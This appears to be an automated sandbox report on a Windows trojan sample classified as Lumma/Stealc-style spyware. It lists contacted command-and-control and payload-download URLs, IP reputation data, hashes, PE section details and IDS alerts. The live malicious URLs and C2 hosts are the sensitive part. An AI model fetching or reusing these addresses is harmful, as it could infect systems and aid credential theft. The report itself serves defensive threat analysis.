https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta	file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store/KU	file.exe, 00000000.00000003.1379874519.0000000001410000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://navygenerayk.store/	file.exe, 00000000.00000003.1482150214.000000000142E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410739039.0000000005C7A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435484248.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1434867716.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432158252.0000000005C77000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557816294.000000000142E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435121936.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1411774081.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435963593.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433915190.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navygenerayk.store/W	file.exe, 00000000.00000003.1455741546.000000000142E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1482150214.000000000142E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/off/def.exee	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store/apiF	file.exe, 00000000.00000003.1451115025.000000000142E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/6c4adf523b719729.phpX	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://navygenerayk.store/0	file.exe, 00000000.00000003.1433014514.000000000141B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1410542274.000000000141A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1436516458.000000000141B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432239221.000000000141A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/6c4adf523b719729.phpL	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/6c4adf523b719729.php2	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/mandconnroutehelper.dll	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.206/6c4adf523b719729.php/	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/6c4adf523b719729.php0	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://navygenerayk.store/7	file.exe, 00000000.00000003.1432885292.0000000005C7D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432158252.0000000005C77000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1396415390.0000000005C79000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.1415151344.0000000005F03000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe4	file.exe, 00000000.00000002.1625319750.000000000116A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.	file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/~k	file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/	file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exeC	file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.1410587329.0000000005BEE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/rosoft	file.exe, 00000000.00000002.1625467366.000000000142E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.1432224690.0000000001437000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206	file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1380511134.0000000005C17000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	navygenerayk.store	European Union	13335	CLOUDFLARENETUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1552250
Start date and time:	2024-11-08 15:19:39 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@7/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 7508 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
09:20:35	API Interceptor	8x Sleep call for process: file.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	ConfirmaciXnXdeXfacturaXPedidoXadicional.doc	Get hash	malicious	Unknown	Browse	paste.ee/d/qImtr
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/oV9U9W0U/download
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/21zJLAjt/download
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	www.dodsrprolev.shop/42jb/
	Hesap.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/74ri/
	file.exe	Get hash	malicious	LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar	Browse	sosipisos.cc/SXQNMYTM.exe
	7RAK4mZ6nc.exe	Get hash	malicious	Metasploit	Browse	downsexv.com:8080/pptFudI4N_bZd9h2vlE2HgX6nJupnvnNvPpodtqLmxX2OC5MJtjR8Cw2hx7Jj0FM_ofkLnmJ
	Shipping documents..exe	Get hash	malicious	FormBook	Browse	www.bzxs.info/v58i/
	icRicpJWczmiOf8.exe	Get hash	malicious	FormBook	Browse	www.figa1digital.services/zjtq/
	xBA TM06-Q6-11-24.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/Sv5Cw
185.215.113.206	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.206/6c4adf523b719729.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206/6c4adf523b719729.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
navygenerayk.store	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	QzX4KXBXPq.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
s-part-0017.t-0009.fb-t-msedge.net	pzPO97QouM.exe	Get hash	malicious	ScreenConnect Tool	Browse	13.107.253.45
	Multi Graphics Inc CustomerVendor Form.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	OaSEt8i2jE.exe	Get hash	malicious	Njrat	Browse	13.107.253.45
	https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkG	Get hash	malicious	Unknown	Browse	13.107.253.45
	PORgjGswYg.exe	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://login-zendesk-account.servz.com.pk	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS5d7c8770636a4f3fd2ed2ec05584079425wDnNeW8yycT&sa=t&esrc=nNeW8F5d7c8770636a4f3fd2ed2ec05584079425A0xys8Em2FL&source=&cd=tS6T85d7c8770636a4f3fd2ed2ec05584079425Tiw9XH&cad=XpPkDfJX5d7c8770636a4f3fd2ed2ec05584079425VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fbyda.ng%2Fcig.bin%2Fgoin%2F%23c2VjcmV0YXJpYXRAcGVvLm9uLmNh	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.253.45
	COw7owNqAr.exe	Get hash	malicious	FormBook	Browse	13.107.253.45
	SecuriteInfo.com.Variant.Symmi.42162.17217.532.dll	Get hash	malicious	Numando	Browse	13.107.253.45
	file.exe	Get hash	malicious	Unknown	Browse	13.107.253.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.16.103.112
	http://dse_NA4@docusign.net	Get hash	malicious	Unknown	Browse	104.18.66.57
	securedoc_20241104T081116.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.97.3
	#U25b6#Ufe0fVoice_mail_02309_wav0015.html	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.17.25.14
	MJ5bO7kS7j.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TtyCIqbov8.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://appdata.lclouds.pro	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	188.114.96.3
	https://www.canva.com/design/DAGV5EObRdI/I7eos98ZtlH9jC4ToJM3Lw/view?utm_content=DAGV5EObRdI&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.16.79.73
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	CatalogApp.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	yPSjWvD9LD.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	3.dll	Get hash	malicious	Unknown	Browse	188.114.97.3
	0TokOhBLe6.dll	Get hash	malicious	BruteRatel, Latrodectus	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.61916060252666
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'204'096 bytes
MD5:	7ac86c152bac1fb0212a7ff9087a26e4
SHA1:	97b164dc69af36443b6e49173f2ce406e74d1c00
SHA256:	15b6ba95ac1a5a5f782d888d427ab68983920cd39196012e148b1d3d75166651
SHA512:	1f931cc24b29b43a5a73ebaac281d229cdcf1cd21f37c7f7f7e4c094744b98c6c390619bdcf97b7bdfe9508d2906c85a0219c4ee1e0c23d8c392eb6e8e57ef1c
SSDEEP:	98304:3wG9+fyV/2JJtaPR/vd74+Wbd9X/id1vbu3pau:9+fwwd/id1+pr
TLSH:	55E54B91BA0573CFD4EE6FB45093CD4A591D06EE071D04CBA81D6ABE6D62CC122B9E3C
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............0...........@.......................... 1.......1...@.................................T...h..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x70f000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4E048491DAh
cmpps xmm6, dqword ptr [eax], 00h
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F4E0484B1D5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x59000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x58000	0x58000	506afb5b63fabfd4a6ec1cccfdc3eece	False	0.5739579634232954	data	7.062234749367177	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x59000	0x340	0x400	914cd139a383496d0085d499d138ef92	False	0.390625	data	4.997389973748798	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a000	0x1000	0x200	555a11fa24a077379003c187d9c9d020	False	0.14453125	data	0.9996515881509258	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
anltzulc	0x5b000	0x2b3000	0x2b2800	24b100903e1fbaf0d9feea4e2ba7da90	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tzjtjjai	0x30e000	0x1000	0x400	34674952f0a95368610affacd2a69012	False	0.763671875	data	6.04622812635183	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x30f000	0x3000	0x2200	b4a1ae637d4a5b7f24be0245d63f22fd	False	0.00666360294117647	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x59058	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-08T15:20:35.396251+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.9	58084	1.1.1.1	53	UDP
2024-11-08T15:20:35.423925+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.9	62739	1.1.1.1	53	UDP
2024-11-08T15:20:35.455933+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.9	52384	1.1.1.1	53	UDP
2024-11-08T15:20:35.480837+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.9	61606	1.1.1.1	53	UDP
2024-11-08T15:20:35.505179+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.9	59057	1.1.1.1	53	UDP
2024-11-08T15:20:35.530445+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.9	49464	1.1.1.1	53	UDP
2024-11-08T15:20:35.553917+0100	2057119	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)	1	192.168.2.9	53505	1.1.1.1	53	UDP
2024-11-08T15:20:36.332997+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.9	49726	188.114.97.3	443	TCP
2024-11-08T15:20:36.332997+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49726	188.114.97.3	443	TCP
2024-11-08T15:20:36.904002+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.9	49726	188.114.97.3	443	TCP
2024-11-08T15:20:36.904002+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49726	188.114.97.3	443	TCP
2024-11-08T15:20:37.571063+0100	2057120	ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)	1	192.168.2.9	49733	188.114.97.3	443	TCP
2024-11-08T15:20:37.571063+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.9	49733	188.114.97.3	443	TCP
2024-11-08T15:20:38.073012+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.9	49733	188.114.97.3	443	TCP
2024-11-08T15:20:38.073012+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49733	188.114.97.3	443	TCP
